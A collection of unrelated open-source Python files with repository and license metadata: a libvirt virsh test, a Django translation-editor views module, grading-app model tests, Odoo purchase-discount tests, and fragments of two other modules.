)
__all__ = ['render_to_string',
'render',
'patterns',
'include',
'url',
'reverse',
'NoReverseMatch',
'generic_tag_compiler',
'parse_bits',
'get_cache']
|
5monkeys/djedi-cms
|
djedi/compat.py
|
Python
|
bsd-3-clause
| 3,464
|
import os
from autotest.client.shared import error
from autotest.client.shared import utils
from virttest import virsh
from provider import libvirt_version
def run(test, params, env):
"""
Test command: virsh net-dumpxml.
This command can output the network information as an XML dump to stdout.
1.Get all parameters from config file.
2.If test case's network status is inactive, destroy it.
3.Perform virsh net-dumpxml operation.
4.Recover test environment(network status).
5.Confirm the test result.
"""
status_error = params.get("status_error", "no")
net_ref = params.get("net_dumpxml_net_ref")
net_name = params.get("net_dumpxml_network", "default")
net_status = params.get("net_dumpxml_network_status", "active")
xml_flie = params.get("net_dumpxml_xml_file", "default.xml")
extra = params.get("net_dumpxml_extra", "")
network_xml = os.path.join(test.tmpdir, xml_flie)
# acl polkit params
uri = params.get("virsh_uri")
unprivileged_user = params.get('unprivileged_user')
if unprivileged_user:
if unprivileged_user.count('EXAMPLE'):
unprivileged_user = 'testacl'
if not libvirt_version.version_compare(1, 1, 1):
if params.get('setup_libvirt_polkit') == 'yes':
raise error.TestNAError("API acl test not supported in current"
" libvirt version.")
# Run test case
if net_ref == "uuid":
net_ref = virsh.net_uuid(net_name).stdout.strip()
elif net_ref == "name":
net_ref = net_name
net_status_current = "active"
if not virsh.net_state_dict()[net_name]['active']:
net_status_current = "inactive"
if not virsh.net_state_dict()[net_name]['persistent']:
raise error.TestError("Network is transient!")
try:
if net_status == "inactive" and net_status_current == "active":
status_destroy = virsh.net_destroy(net_name,
ignore_status=True).exit_status
if status_destroy != 0:
raise error.TestError("Network destroied failed!")
virsh_dargs = {'ignore_status': True}
if params.get('setup_libvirt_polkit') == 'yes':
virsh_dargs['unprivileged_user'] = unprivileged_user
virsh_dargs['uri'] = uri
result = virsh.net_dumpxml(net_ref, extra, network_xml,
**virsh_dargs)
status = result.exit_status
err = result.stderr.strip()
xml_validate_cmd = "virt-xml-validate %s network" % network_xml
valid_s = utils.run(xml_validate_cmd, ignore_status=True).exit_status
# Check option valid or not.
if extra.find("--") != -1:
options = extra.split("--")
for option in options:
if option.strip() == "":
continue
if not virsh.has_command_help_match("net-dumpxml",
option.strip()) and\
status_error == "no":
raise error.TestNAError("The current libvirt version"
" doesn't support '%s' option"
% option.strip())
finally:
# Recover network
if net_status == "inactive" and net_status_current == "active":
status_start = virsh.net_start(net_name,
ignore_status=True).exit_status
if status_start != 0:
raise error.TestError("Network started failed!")
# Check status_error
if status_error == "yes":
if status == 0:
raise error.TestFail("Run successfully with wrong command!")
if err == "":
raise error.TestFail("The wrong command has no error outputed!")
elif status_error == "no":
if status != 0:
raise error.TestFail("Run failed with right command!")
if valid_s != 0:
raise error.TestFail("Command output is invalid!")
else:
raise error.TestError("The status_error must be 'yes' or 'no'!")
|
svirt/tp-libvirt
|
libvirt/tests/src/virsh_cmd/network/virsh_net_dumpxml.py
|
Python
|
gpl-2.0
| 4,174
|
from django.conf import settings
from django.contrib.auth.decorators import user_passes_test
from django.core.paginator import Paginator
from django.core.urlresolvers import reverse
from django.http import Http404, HttpResponseRedirect, HttpResponse
from django.shortcuts import render
from django.utils.encoding import iri_to_uri
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.cache import never_cache
from django.utils.encoding import force_text
from django.contrib import messages
from microsofttranslator import Translator, TranslateApiException
from autotranslate.conf import settings as autotranslate_settings
from polib import pofile
from autotranslate.poutil import find_pos, pagination_range, timestamp_with_timezone
from autotranslate.signals import entry_changed, post_save
from autotranslate.storage import get_storage
from autotranslate.access import can_translate, can_translate_language
import json
import re
import autotranslate
import unicodedata
import hashlib
import os
import six
@never_cache
@user_passes_test(lambda user: can_translate(user), settings.LOGIN_URL)
def home(request):
"""
Displays a list of messages to be translated
"""
def fix_nls(in_, out_):
"""Fixes submitted translations by filtering carriage returns and pairing
newlines at the begging and end of the translated string with the original
"""
if 0 == len(in_) or 0 == len(out_):
return out_
if "\r" in out_ and "\r" not in in_:
out_ = out_.replace("\r", '')
if "\n" == in_[0] and "\n" != out_[0]:
out_ = "\n" + out_
elif "\n" != in_[0] and "\n" == out_[0]:
out_ = out_.lstrip()
if 0 == len(out_):
pass
elif "\n" == in_[-1] and "\n" != out_[-1]:
out_ = out_ + "\n"
elif "\n" != in_[-1] and "\n" == out_[-1]:
out_ = out_.rstrip()
return out_
def _request_request(key, default=None):
if key in request.GET:
return request.GET.get(key)
elif key in request.POST:
return request.POST.get(key)
return default
storage = get_storage(request)
query = ''
if storage.has('autotranslate_i18n_fn'):
autotranslate_i18n_fn = storage.get('autotranslate_i18n_fn')
autotranslate_i18n_app = get_app_name(autotranslate_i18n_fn)
autotranslate_i18n_lang_code = storage.get('autotranslate_i18n_lang_code')
autotranslate_i18n_lang_bidi = autotranslate_i18n_lang_code.split('-')[0] in settings.LANGUAGES_BIDI
autotranslate_i18n_write = storage.get('autotranslate_i18n_write', True)
if autotranslate_i18n_write:
autotranslate_i18n_pofile = pofile(autotranslate_i18n_fn, wrapwidth=autotranslate_settings.POFILE_WRAP_WIDTH)
for entry in autotranslate_i18n_pofile:
entry.md5hash = hashlib.md5(
(six.text_type(entry.msgid) +
six.text_type(entry.msgstr) +
six.text_type(entry.msgctxt or "")).encode('utf8')
).hexdigest()
else:
autotranslate_i18n_pofile = storage.get('autotranslate_i18n_pofile')
if 'filter' in request.GET:
if request.GET.get('filter') in ('untranslated', 'translated', 'fuzzy', 'all'):
filter_ = request.GET.get('filter')
storage.set('autotranslate_i18n_filter', filter_)
return HttpResponseRedirect(reverse('autotranslate-home'))
autotranslate_i18n_filter = storage.get('autotranslate_i18n_filter', 'all')
if '_next' in request.POST:
rx = re.compile(r'^m_([0-9a-f]+)')
rx_plural = re.compile(r'^m_([0-9a-f]+)_([0-9]+)')
file_change = False
for key, value in request.POST.items():
md5hash = None
plural_id = None
if rx_plural.match(key):
md5hash = str(rx_plural.match(key).groups()[0])
# polib parses .po files into unicode strings, but
# doesn't bother to convert plural indexes to int,
# so we need unicode here.
plural_id = six.text_type(rx_plural.match(key).groups()[1])
# Above no longer true as of Polib 1.0.4
if plural_id and plural_id.isdigit():
plural_id = int(plural_id)
elif rx.match(key):
md5hash = str(rx.match(key).groups()[0])
if md5hash is not None:
entry = autotranslate_i18n_pofile.find(md5hash, 'md5hash')
# If someone did a makemessage, some entries might
# have been removed, so we need to check.
if entry:
old_msgstr = entry.msgstr
if plural_id is not None:
plural_string = fix_nls(entry.msgid_plural, value)
entry.msgstr_plural[plural_id] = plural_string
else:
entry.msgstr = fix_nls(entry.msgid, value)
is_fuzzy = bool(request.POST.get('f_%s' % md5hash, False))
old_fuzzy = 'fuzzy' in entry.flags
if old_fuzzy and not is_fuzzy:
entry.flags.remove('fuzzy')
elif not old_fuzzy and is_fuzzy:
entry.flags.append('fuzzy')
file_change = True
if old_msgstr != value or old_fuzzy != is_fuzzy:
entry_changed.send(sender=entry,
user=request.user,
old_msgstr=old_msgstr,
old_fuzzy=old_fuzzy,
pofile=autotranslate_i18n_fn,
language_code=autotranslate_i18n_lang_code,
)
else:
storage.set('autotranslate_last_save_error', True)
if file_change and autotranslate_i18n_write:
try:
autotranslate_i18n_pofile.metadata['Last-Translator'] = unicodedata.normalize('NFKD', u"%s %s <%s>" % (
getattr(request.user, 'first_name', 'Anonymous'),
getattr(request.user, 'last_name', 'User'),
getattr(request.user, 'email', 'anonymous@user.tld')
)).encode('ascii', 'ignore')
autotranslate_i18n_pofile.metadata['X-Translated-Using'] = u"dj-translate %s" % autotranslate.get_version(False)
autotranslate_i18n_pofile.metadata['PO-Revision-Date'] = timestamp_with_timezone()
except UnicodeDecodeError:
pass
try:
autotranslate_i18n_pofile.save()
po_filepath, ext = os.path.splitext(autotranslate_i18n_fn)
if autotranslate_settings.AUTO_COMPILE:
save_as_mo_filepath = po_filepath + '.mo'
autotranslate_i18n_pofile.save_as_mofile(save_as_mo_filepath)
post_save.send(sender=None, language_code=autotranslate_i18n_lang_code, request=request)
# Try auto-reloading via the WSGI daemon mode reload mechanism
if autotranslate_settings.WSGI_AUTO_RELOAD and \
'mod_wsgi.process_group' in request.environ and \
request.environ.get('mod_wsgi.process_group', None) and \
'SCRIPT_FILENAME' in request.environ and \
int(request.environ.get('mod_wsgi.script_reloading', '0')):
try:
os.utime(request.environ.get('SCRIPT_FILENAME'), None)
except OSError:
pass
# Try auto-reloading via uwsgi daemon reload mechanism
if autotranslate_settings.UWSGI_AUTO_RELOAD:
try:
import uwsgi
# pretty easy right?
uwsgi.reload()
except:
# we may not be running under uwsgi :P
pass
except Exception as e:
messages.error(request, e)
storage.set('autotranslate_i18n_write', False)
storage.set('autotranslate_i18n_pofile', autotranslate_i18n_pofile)
# Retain query arguments
query_arg = '?_next=1'
if _request_request('query', False):
query_arg += '&query=%s' % _request_request('query')
if 'page' in request.GET:
query_arg += '&page=%d&_next=1' % int(request.GET.get('page'))
return HttpResponseRedirect(reverse('autotranslate-home') + iri_to_uri(query_arg))
autotranslate_i18n_lang_code = storage.get('autotranslate_i18n_lang_code')
if _request_request('query', False) and _request_request('query', '').strip():
query = _request_request('query', '').strip()
rx = re.compile(re.escape(query), re.IGNORECASE)
paginator = Paginator([e_ for e_ in autotranslate_i18n_pofile if not e_.obsolete and rx.search(six.text_type(e_.msgstr) + six.text_type(e_.msgid) + u''.join([o[0] for o in e_.occurrences]))], autotranslate_settings.MESSAGES_PER_PAGE)
else:
if autotranslate_i18n_filter == 'untranslated':
paginator = Paginator(autotranslate_i18n_pofile.untranslated_entries(), autotranslate_settings.MESSAGES_PER_PAGE)
elif autotranslate_i18n_filter == 'translated':
paginator = Paginator(autotranslate_i18n_pofile.translated_entries(), autotranslate_settings.MESSAGES_PER_PAGE)
elif autotranslate_i18n_filter == 'fuzzy':
paginator = Paginator([e_ for e_ in autotranslate_i18n_pofile.fuzzy_entries() if not e_.obsolete], autotranslate_settings.MESSAGES_PER_PAGE)
else:
paginator = Paginator([e_ for e_ in autotranslate_i18n_pofile if not e_.obsolete], autotranslate_settings.MESSAGES_PER_PAGE)
if autotranslate_settings.ENABLE_REFLANG:
ref_lang = storage.get('autotranslate_i18n_ref_lang_code', 'msgid')
ref_pofile = None
if ref_lang != 'msgid':
ref_fn = re.sub('/locale/[a-z]{2}/', '/locale/%s/' % ref_lang, autotranslate_i18n_fn)
try:
ref_pofile = pofile(ref_fn)
except IOError:
# there's a syntax error in the PO file and polib can't open it. Let's just
# do nothing and thus display msgids.
pass
for o in paginator.object_list:
# default
o.ref_txt = o.msgid
if ref_pofile is not None:
ref_entry = ref_pofile.find(o.msgid)
if ref_entry is not None and ref_entry.msgstr:
o.ref_txt = ref_entry.msgstr
LANGUAGES = list(settings.LANGUAGES) + [('msgid', 'MSGID')]
else:
ref_lang = None
LANGUAGES = settings.LANGUAGES
page = 1
if 'page' in request.GET:
try:
get_page = int(request.GET.get('page'))
except ValueError:
page = 1 # fall back to page 1
else:
if 0 < get_page <= paginator.num_pages:
page = get_page
if '_next' in request.GET or '_next' in request.POST:
page += 1
if page > paginator.num_pages:
page = 1
query_arg = '?page=%d' % page
return HttpResponseRedirect(reverse('autotranslate-home') + iri_to_uri(query_arg))
autotranslate_messages = paginator.page(page).object_list
main_language = None
if autotranslate_settings.MAIN_LANGUAGE and autotranslate_settings.MAIN_LANGUAGE != autotranslate_i18n_lang_code:
for language in settings.LANGUAGES:
if language[0] == autotranslate_settings.MAIN_LANGUAGE:
main_language = _(language[1])
break
fl = ("/%s/" % autotranslate_settings.MAIN_LANGUAGE).join(autotranslate_i18n_fn.split("/%s/" % autotranslate_i18n_lang_code))
po = pofile(fl)
for message in autotranslate_messages:
message.main_lang = po.find(message.msgid).msgstr
needs_pagination = paginator.num_pages > 1
if needs_pagination:
if paginator.num_pages >= 10:
page_range = pagination_range(1, paginator.num_pages, page)
else:
page_range = range(1, 1 + paginator.num_pages)
try:
ADMIN_MEDIA_PREFIX = settings.ADMIN_MEDIA_PREFIX
ADMIN_IMAGE_DIR = ADMIN_MEDIA_PREFIX + 'img/admin/'
except AttributeError:
ADMIN_MEDIA_PREFIX = settings.STATIC_URL + 'admin/'
ADMIN_IMAGE_DIR = ADMIN_MEDIA_PREFIX + 'img/'
if storage.has('autotranslate_last_save_error'):
storage.delete('autotranslate_last_save_error')
autotranslate_last_save_error = True
else:
autotranslate_last_save_error = False
try:
autotranslate_i18n_lang_name = force_text(_(storage.get('autotranslate_i18n_lang_name')))
except:
autotranslate_i18n_lang_name = force_text(storage.get('autotranslate_i18n_lang_name'))
return render(request, 'autotranslate/pofile.html', dict(
version=autotranslate.get_version(True),
ADMIN_MEDIA_PREFIX=ADMIN_MEDIA_PREFIX,
ADMIN_IMAGE_DIR=ADMIN_IMAGE_DIR,
ENABLE_REFLANG=autotranslate_settings.ENABLE_REFLANG,
LANGUAGES=LANGUAGES,
autotranslate_settings=autotranslate_settings,
autotranslate_i18n_lang_name=autotranslate_i18n_lang_name,
autotranslate_i18n_lang_code=autotranslate_i18n_lang_code,
autotranslate_i18n_lang_bidi=autotranslate_i18n_lang_bidi,
autotranslate_last_save_error=autotranslate_last_save_error,
autotranslate_i18n_filter=autotranslate_i18n_filter,
autotranslate_i18n_write=autotranslate_i18n_write,
autotranslate_messages=autotranslate_messages,
page_range=needs_pagination and page_range,
needs_pagination=needs_pagination,
main_language=main_language,
autotranslate_i18n_app=autotranslate_i18n_app,
page=page,
query=query,
paginator=paginator,
autotranslate_i18n_pofile=autotranslate_i18n_pofile,
ref_lang=ref_lang,
))
else:
return list_languages(request, do_session_warn=True)
@never_cache
@user_passes_test(lambda user: can_translate(user), settings.LOGIN_URL)
def download_file(request):
import zipfile
storage = get_storage(request)
# original filename
autotranslate_i18n_fn = storage.get('autotranslate_i18n_fn', None)
# in-session modified catalog
autotranslate_i18n_pofile = storage.get('autotranslate_i18n_pofile', None)
# language code
autotranslate_i18n_lang_code = storage.get('autotranslate_i18n_lang_code', None)
if not autotranslate_i18n_lang_code or not autotranslate_i18n_pofile or not autotranslate_i18n_fn:
return HttpResponseRedirect(reverse('autotranslate-home'))
try:
if len(autotranslate_i18n_fn.split('/')) >= 5:
offered_fn = '_'.join(autotranslate_i18n_fn.split('/')[-5:])
else:
offered_fn = autotranslate_i18n_fn.split('/')[-1]
po_fn = str(autotranslate_i18n_fn.split('/')[-1])
mo_fn = str(po_fn.replace('.po', '.mo')) # not so smart, huh
zipdata = six.BytesIO()
zipf = zipfile.ZipFile(zipdata, mode="w")
zipf.writestr(po_fn, six.text_type(autotranslate_i18n_pofile).encode("utf8"))
zipf.writestr(mo_fn, autotranslate_i18n_pofile.to_binary())
zipf.close()
zipdata.seek(0)
response = HttpResponse(zipdata.read())
response['Content-Disposition'] = 'attachment; filename=%s.%s.zip' % (offered_fn, autotranslate_i18n_lang_code)
response['Content-Type'] = 'application/x-zip'
return response
except Exception:
return HttpResponseRedirect(reverse('autotranslate-home'))
@never_cache
@user_passes_test(lambda user: can_translate(user), settings.LOGIN_URL)
def list_languages(request, do_session_warn=False):
"""
Lists the languages for the current project, the gettext catalog files
that can be translated and their translation progress
"""
storage = get_storage(request)
languages = []
if 'filter' in request.GET:
if request.GET.get('filter') in ('project', 'third-party', 'django', 'all'):
filter_ = request.GET.get('filter')
storage.set('autotranslate_i18n_catalog_filter', filter_)
return HttpResponseRedirect(reverse('autotranslate-pick-file'))
autotranslate_i18n_catalog_filter = storage.get('autotranslate_i18n_catalog_filter', 'project')
third_party_apps = autotranslate_i18n_catalog_filter in ('all', 'third-party')
django_apps = autotranslate_i18n_catalog_filter in ('all', 'django')
project_apps = autotranslate_i18n_catalog_filter in ('all', 'project')
has_pos = False
for language in settings.LANGUAGES:
if not can_translate_language(request.user, language[0]):
continue
pos = find_pos(language[0], project_apps=project_apps, django_apps=django_apps, third_party_apps=third_party_apps)
has_pos = has_pos or len(pos)
languages.append(
(
language[0],
_(language[1]),
sorted([(get_app_name(l), os.path.realpath(l), pofile(l)) for l in pos], key=lambda app: app[0]),
)
)
try:
ADMIN_MEDIA_PREFIX = settings.ADMIN_MEDIA_PREFIX
except AttributeError:
ADMIN_MEDIA_PREFIX = settings.STATIC_URL + 'admin/'
do_session_warn = do_session_warn and 'SessionAutotranslateStorage' in autotranslate_settings.STORAGE_CLASS and 'signed_cookies' in settings.SESSION_ENGINE
return render(request, 'autotranslate/languages.html', dict(
version=autotranslate.get_version(True),
ADMIN_MEDIA_PREFIX=ADMIN_MEDIA_PREFIX,
do_session_warn=do_session_warn,
languages=languages,
has_pos=has_pos,
autotranslate_i18n_catalog_filter=autotranslate_i18n_catalog_filter
))
def get_app_name(path):
app = path.split("/locale")[0].split("/")[-1]
return app
@never_cache
@user_passes_test(lambda user: can_translate(user), settings.LOGIN_URL)
def lang_sel(request, langid, idx):
"""
Selects a file to be translated
"""
storage = get_storage(request)
if langid not in [l[0] for l in settings.LANGUAGES] or not can_translate_language(request.user, langid):
raise Http404
else:
autotranslate_i18n_catalog_filter = storage.get('autotranslate_i18n_catalog_filter', 'project')
third_party_apps = autotranslate_i18n_catalog_filter in ('all', 'third-party')
django_apps = autotranslate_i18n_catalog_filter in ('all', 'django')
project_apps = autotranslate_i18n_catalog_filter in ('all', 'project')
file_ = sorted(find_pos(langid, project_apps=project_apps, django_apps=django_apps, third_party_apps=third_party_apps), key=get_app_name)[int(idx)]
storage.set('autotranslate_i18n_lang_code', langid)
storage.set('autotranslate_i18n_lang_name', six.text_type([l[1] for l in settings.LANGUAGES if l[0] == langid][0]))
storage.set('autotranslate_i18n_fn', file_)
po = pofile(file_)
for entry in po:
entry.md5hash = hashlib.new(
'md5',
(six.text_type(entry.msgid) +
six.text_type(entry.msgstr) +
six.text_type(entry.msgctxt or "")).encode('utf8')
).hexdigest()
storage.set('autotranslate_i18n_pofile', po)
try:
os.utime(file_, None)
storage.set('autotranslate_i18n_write', True)
except OSError:
storage.set('autotranslate_i18n_write', False)
return HttpResponseRedirect(reverse('autotranslate-home'))
def ref_sel(request, langid):
storage = get_storage(request)
ALLOWED_LANGUAGES = [l[0] for l in settings.LANGUAGES] + ['msgid']
if langid not in ALLOWED_LANGUAGES:
raise Http404
storage.set('autotranslate_i18n_ref_lang_code', langid)
return HttpResponseRedirect(reverse('autotranslate-home'))
ref_sel = never_cache(ref_sel)
ref_sel = user_passes_test(lambda user: can_translate(user), settings.LOGIN_URL)(ref_sel)
@user_passes_test(lambda user: can_translate(user), settings.LOGIN_URL)
def translate_text(request):
language_from = request.GET.get('from', None)
language_to = request.GET.get('to', None)
text = request.GET.get('text', None)
if language_from == language_to:
data = {'success': True, 'translation': text}
else:
# run the translation:
AZURE_CLIENT_ID = getattr(settings, 'AZURE_CLIENT_ID', None)
AZURE_CLIENT_SECRET = getattr(settings, 'AZURE_CLIENT_SECRET', None)
translator = Translator(AZURE_CLIENT_ID, AZURE_CLIENT_SECRET)
try:
translated_text = translator.translate(text, language_to, language_from)
data = {'success': True, 'translation': translated_text}
except TranslateApiException as e:
data = {'success': False, 'error': "Translation API Exception: {0}".format(e.message)}
return HttpResponse(json.dumps(data), content_type='application/json')
|
dadasoz/dj-translate
|
autotranslate/views.py
|
Python
|
mit
| 22,363
|
# coding=utf-8
from django.contrib.auth.models import User, Group
from django.test.testcases import TestCase
from grading.models import *
from grading.autograding import get_autograders
class StudentTest(TestCase):
def test_user_creation_creates_student(self):
u = User.objects.create(username = "test1", email="foo@foo.pl")
u.groups.add(Group.objects.get(name = "students"))
u.save()
qs = Student.objects.filter(user=u)
self.assertEqual(len(qs), 1)
def test_can_update_user(self):
u = User.objects.create(username = "test1", email="foo@foo.pl")
u.groups.add(Group.objects.get(name = "students"))
u.save()
u.email = "bar@bar.pl"
u.save()
def test_student_not_created_for_inactive_users(self):
u = User.objects.create(username = "test1", email="foo@foo.pl", is_active=False)
u.groups.add(Group.objects.get(name = "students"))
u.save()
qs = Student.objects.filter(user=u)
self.assertEqual(len(qs), 0)
def test_student_not_created_for_staff_users(self):
u = User.objects.create(username = "test1", email="foo@foo.pl", is_staff=True)
u.groups.add(Group.objects.get(name = "students"))
u.save()
qs = Student.objects.filter(user=u)
self.assertEqual(len(qs), 0)
class ActivityTest(TestCase):
def test_sort_key_auto_set(self):
a = GradeableActivity.objects.create(name="foo")
self.assertEqual(a.sort_key, "foo")
class TestFixture(TestCase):
def setUp(self):
self.u = User.objects.create(username = "test1", email="foo@foo.pl")
self.u.groups.add(Group.objects.get(name = "students"))
self.u.save()
self.student = Student.objects.filter(user=self.u).get()
self.other_user = User.objects.create(username = "other", email="foo@foo.pl")
self.other_user.groups.add(Group.objects.get(name = "students"))
self.other_user.save()
self.other_student =Student.objects.filter(user=self.other_user).get()
self.group = Course.objects.create(name = "course")
self.other_group = Course.objects.create(name = "other_group")
self.student.course = self.group
self.student.save()
self.other_student.course = self.other_group
self.other_student.save()
self.activity = GradeableActivity(name = "activity")
self.activity.save()
self.activity.courses.add(self.group)
self.activity.save()
self.otheractivity = GradeableActivity(name = "other")
self.otheractivity.save()
self.otheractivity.courses.add(self.other_group)
self.otheractivity.save()
class TestGrades(TestFixture):
def test_sync_grades_when_activity_is_added_to_group(self):
# After setup it shpould be so:
self.assertEqual(len(self.student.grades.all()), 1)
#Other student shouldn't change
self.assertEqual(len(self.other_student.grades.all()), 1)
activity = GradeableActivity(name = "activity2")
activity.save()
activity.courses.add(self.group)
activity.save()
#Now we should have two grades
self.assertEqual(len(self.student.grades.all()), 2)
#Other student shouldn't change
self.assertEqual(len(self.other_student.grades.all()), 1)
for g in self.student.grades.all():
self.assertEqual(g.grade, 2.0)
def test_sync_grades_when_student_is_added_to_group(self):
u = User.objects.create(username = "test2", email="foo@foo.pl")
u.groups.add(Group.objects.get(name = "students"))
u.save()
student = Student.objects.filter(user=u).get()
# Before addition there should be no grades
self.assertEqual(len(student.grades.all()), 0)
student.course = self.group
student.save()
self.assertEqual(len(student.grades.all()), 1)
class TestGrading(TestFixture):
def setUp(self):
super(TestGrading, self).setUp()
self.grade_part_1 = GradePart.objects.create(
weight = 1,
required = True,
activity = self.activity,
name = "Zadanie 1"
)
self.grade_part_2 = GradePart.objects.create(
weight = 2,
required = False,
activity = self.activity,
name = "Zadanie 2"
)
self.activity.default_grade = 812.0
self.activity.save()
def test_default_grade_retuended_when_all_activities_unfinished(self):
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertEqual(sg.grade, 812.0)
self.assertIn('Zadanie 1', sg.short_description)
def test_default_grade_retuended_when_required_activities_unfinished(self):
GradePart.objects.grade(self.grade_part_2, self.student, 5)
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertEqual(sg.grade, 812.0)
self.assertIn('Zadanie 1', sg.short_description)
def test_grade_calculated_when_all_required_activitees_finished(self):
GradePart.objects.grade(self.grade_part_1, self.student, 5)
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertEqual(sg.grade, 3)
def test_grade_calculated_when_all_activities_finished(self):
GradePart.objects.grade(self.grade_part_2, self.student, 3)
GradePart.objects.grade(self.grade_part_1, self.student, 3)
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertEqual(sg.grade, 3)
def test_default_grade_returned_when_regired_activity_has_grade_below_passing(self):
GradePart.objects.grade(self.grade_part_1, self.student, 2)
GradePart.objects.grade(self.grade_part_2, self.student, 3)
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertEqual(sg.grade, 812.0)
def test_grade_gets_updated(self):
GradePart.objects.grade(self.grade_part_1, self.student, 5.0)
self.assertEqual(StudentGrade.objects.get(student=self.student, activity=self.activity).grade, 3)
def test_grade_gets_updated_if_we_add_new_grade_part(self):
#Updates the database so grade is calculated
self.test_grade_calculated_when_all_activities_finished()
#Sanity check
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertNotEqual(sg.grade, 812.0)
GradePart.objects.create(
name = "test-xxx",
required = True,
activity = self.activity,
)
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertEqual(sg.grade, 812.0)
class TestAutogradeableGradePart(TestFixture):
def test_name_is_set(self):
model = AutogradeableGradePart.objects.create(
activity = self.activity,
autograding_controller = get_autograders()['test']
)
self.assertEqual(model.name, model.autograding_controller)
|
jbzdak/data-base-checker
|
grading/tests/test_models.py
|
Python
|
gpl-3.0
| 7,167
|
# Copyright 2016 ACSONE SA/NV (<http://acsone.eu>)
# Copyright 2015-2019 Tecnativa - Pedro M. Baeza
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import odoo.tests.common as common
from odoo import fields
class TestPurchaseOrder(common.SavepointCase):
@classmethod
def setUpClass(cls):
super(TestPurchaseOrder, cls).setUpClass()
cls.categ_cost_average = cls.env["product.category"].create(
{"name": "Average cost method category", "property_cost_method": "average"}
)
product_obj = cls.env["product.product"]
cls.product_1 = product_obj.create(
{"name": "Test product 1", "categ_id": cls.categ_cost_average.id}
)
cls.product_2 = product_obj.create({"name": "Test product 2"})
po_model = cls.env["purchase.order.line"]
currency_rate_model = cls.env["res.currency.rate"]
# Set the Exchange rate for the currency of the company to 1
# to avoid issues with rates
latest_currency_rate_line = currency_rate_model.search(
[
("currency_id", "=", cls.env.user.company_id.currency_id.id),
("name", "=", fields.Date.today()),
],
limit=1,
)
if latest_currency_rate_line and latest_currency_rate_line.rate != 1.0:
latest_currency_rate_line.rate = 1.0
elif not latest_currency_rate_line:
currency_rate_model.create(
{
"currency_id": cls.env.user.company_id.currency_id.id,
"rate": 1.00,
"name": fields.Date.today(),
}
)
cls.purchase_order = cls.env["purchase.order"].create(
{"partner_id": cls.env.ref("base.res_partner_3").id}
)
cls.po_line_1 = po_model.create(
{
"order_id": cls.purchase_order.id,
"product_id": cls.product_1.id,
"date_planned": fields.Datetime.now(),
"name": "Test",
"product_qty": 1.0,
"product_uom": cls.product_1.uom_id.id,
"discount": 50.0,
"price_unit": 10.0,
"taxes_id": [],
}
)
cls.account = cls.env["account.account"].create(
{
"name": "Test account",
"code": "TEST",
"user_type_id": cls.env.ref("account.data_account_type_expenses").id,
}
)
cls.tax = cls.env["account.tax"].create(
{
"name": "Sample tax 15%",
"amount_type": "percent",
"type_tax_use": "purchase",
"amount": 15.0,
"invoice_repartition_line_ids": [
(0, 0, {"factor_percent": 100, "repartition_type": "base"}),
(
0,
0,
{
"factor_percent": 100,
"repartition_type": "tax",
"account_id": cls.account.id,
},
),
],
}
)
cls.po_line_2 = po_model.create(
{
"order_id": cls.purchase_order.id,
"product_id": cls.product_2.id,
"date_planned": fields.Datetime.now(),
"name": "Test",
"product_qty": 10.0,
"product_uom": cls.product_2.uom_id.id,
"discount": 30,
"taxes_id": [(6, 0, [cls.tax.id])],
"price_unit": 230.0,
}
)
cls.po_line_3 = po_model.create(
{
"order_id": cls.purchase_order.id,
"product_id": cls.product_2.id,
"date_planned": fields.Datetime.now(),
"name": "Test",
"product_qty": 1.0,
"product_uom": cls.product_2.uom_id.id,
"discount": 0,
"taxes_id": [(6, 0, [cls.tax.id])],
"price_unit": 10.0,
}
)
def test_purchase_order_vals(self):
self.assertEqual(self.po_line_1.price_subtotal, 5.0)
self.assertEqual(self.po_line_2.price_subtotal, 1610.0)
self.assertEqual(self.po_line_3.price_subtotal, 10.0)
self.assertEqual(self.purchase_order.amount_untaxed, 1625.0)
self.assertEqual(self.purchase_order.amount_tax, 243)
# Change price to launch a recalculation of totals
self.po_line_1.discount = 60
self.assertEqual(self.po_line_1.price_subtotal, 4.0)
self.assertEqual(self.purchase_order.amount_untaxed, 1624.0)
self.assertEqual(self.purchase_order.amount_tax, 243)
def test_move_price_unit(self):
self.purchase_order.button_confirm()
picking = self.purchase_order.picking_ids
moves = picking.move_lines
move1 = moves.filtered(lambda x: x.purchase_line_id == self.po_line_1)
self.assertEqual(move1.price_unit, 5)
move2 = moves.filtered(lambda x: x.purchase_line_id == self.po_line_2)
self.assertEqual(move2.price_unit, 161)
move3 = moves.filtered(lambda x: x.purchase_line_id == self.po_line_3)
self.assertEqual(move3.price_unit, 10)
# Confirm the picking to see the cost price
move1.move_line_ids.qty_done = 1
picking._action_done()
self.assertAlmostEqual(self.product_1.standard_price, 5.0)
# Check data in PO remains the same - This is due to the hack
self.assertAlmostEqual(self.po_line_1.price_unit, 10.0)
self.assertAlmostEqual(self.po_line_1.discount, 50.0)
def test_report_price_unit(self):
rec = self.env["purchase.report"].search(
[("product_id", "=", self.product_1.id)]
)
self.assertEqual(rec.price_total, 5)
self.assertEqual(rec.discount, 50)
def test_invoice(self):
invoice = self.env["account.move"].new(
{
"move_type": "out_invoice",
"partner_id": self.env.ref("base.res_partner_3").id,
"purchase_id": self.purchase_order.id,
}
)
invoice._onchange_purchase_auto_complete()
line = invoice.invoice_line_ids.filtered(
lambda x: x.purchase_line_id == self.po_line_1
)
self.assertEqual(line.discount, 50)
line = invoice.invoice_line_ids.filtered(
lambda x: x.purchase_line_id == self.po_line_2
)
self.assertEqual(line.discount, 30)
line = invoice.invoice_line_ids.filtered(
lambda x: x.purchase_line_id == self.po_line_3
)
self.assertEqual(line.discount, 0)
|
OCA/purchase-workflow
|
purchase_discount/tests/test_purchase_discount.py
|
Python
|
agpl-3.0
| 6,834
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Odoo, an open source suite of business apps
# This module copyright (C) 2015 bloopark systems (<http://bloopark.de>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
